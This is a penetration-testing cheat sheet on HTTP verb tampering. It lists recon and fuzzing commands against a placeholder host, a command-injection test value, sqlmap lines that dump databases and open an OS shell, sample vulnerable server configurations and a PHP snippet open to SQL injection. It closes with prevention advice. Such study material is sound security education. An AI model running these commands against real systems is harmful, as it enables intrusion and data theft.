1.-HTTP-verb-tampering

1. Identifying Protected Pages (Basic Authentication Bypass)

Using curl to Check for Authentication Prompts

curl -i http://target.com/admin/reset.php
curl -i http://target.com/admin/

Using Burp Suite to Intercept and Examine Requests

  • Use Burp Suite Proxy to capture HTTP requests.

  • Inspect responses for authentication requirements.

2. Identifying Allowed HTTP Methods

Using curl to Send OPTIONS Request

curl -i -X OPTIONS http://target.com/admin/reset.php

Using Netcat to Check Allowed Methods

nc -nv target.com 80
OPTIONS / HTTP/1.1
Host: target.com

3. Exploiting Authentication Bypass

Using HEAD Method for Bypass

curl -i -X HEAD http://target.com/admin/reset.php

  • Manually change HTTP method in Burp Suite.

Bypassing Security Filters by Changing HTTP Method

  • Modify requests from POST to GET or HEAD.

  • Use Burp Suite to modify request methods manually.

Testing Command Injection After Bypass

curl -X GET "http://target.com/page?filename=file1; touch file2;"

4. Insecure Web Server Configurations

Vulnerable Apache Configuration

<Limit GET>
    Require valid-user
</Limit>

  • Can be bypassed using HEAD or OPTIONS methods.

Vulnerable Tomcat Configuration

<http-method>GET</http-method>

Vulnerable ASP.NET Configuration

<allow verbs="GET" roles="admin">

5. Testing for SQL Injection with SQLmap

sqlmap -u "http://target.com/page?code=test" --dbs # Enumerate databases
sqlmap -u "http://target.com/page?code=test" --dump # Dump database content
sqlmap -u "http://target.com/page?code=test" --os-shell # Get OS shell

6. Fuzzing HTTP Methods

Using wfuzz

wfuzz -c -z file,verbs.txt http://target.com/admin/FUZZ

7. Web Scanning and Reconnaissance

Nmap (Port Scanning)

nmap -sV -sC target.com
nmap -p 80,443,8080 target.com

Nikto (Web Server Scanning)

nikto -h target.com

Gobuster (Directory Bruteforce)

gobuster dir -u target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

8. Burp Suite Tools Overview

  • Burp Intruder: Used for fuzzing, brute-forcing, and other automated attacks.

  • Burp Repeater: Used for manually crafting and replaying HTTP requests.

  • Burp Scanner: Used for automated vulnerability scanning.

9. HTTP Verb Tampering Overview

Common HTTP Verbs

  • HEAD: Retrieves headers only.

  • PUT: Replaces a resource.

  • DELETE: Removes a resource.

  • OPTIONS: Lists allowed methods.

  • PATCH: Partially modifies a resource.

Causes of Vulnerabilities

  • Insecure Web Server Configurations

  • Inconsistent Application Logic

  • Weak Input Validation

Example of Insecure Coding (PHP)

if(preg_match($pattern, $_POST["code"])) {
    $query = "SELECT * FROM ports WHERE port_code LIKE '%" . $_REQUEST["code"] . "%'";
}

  • Filters $_POST but uses $_REQUEST, allowing SQL injection via GET requests.

10. Prevention Strategies

  • Apply consistent authentication rules across all HTTP methods.

  • Use strict input validation and sanitization.

  • Disable unnecessary HTTP methods.

  • Configure web servers to restrict HTTP methods properly.

  • Implement Content Security Policies (CSPs) and Web Application Firewalls (WAFs).

Key Takeaways

  • HTTP Verb Tampering can bypass authentication and security controls.

  • Testing HTTP methods is crucial for security assessments.

  • Web server configurations and application code must be securely implemented.

  • Regular security audits and penetration testing help mitigate risks.

PreviousWeb AttacksNext2.-Insecure-direct-object-references-idor

Last updated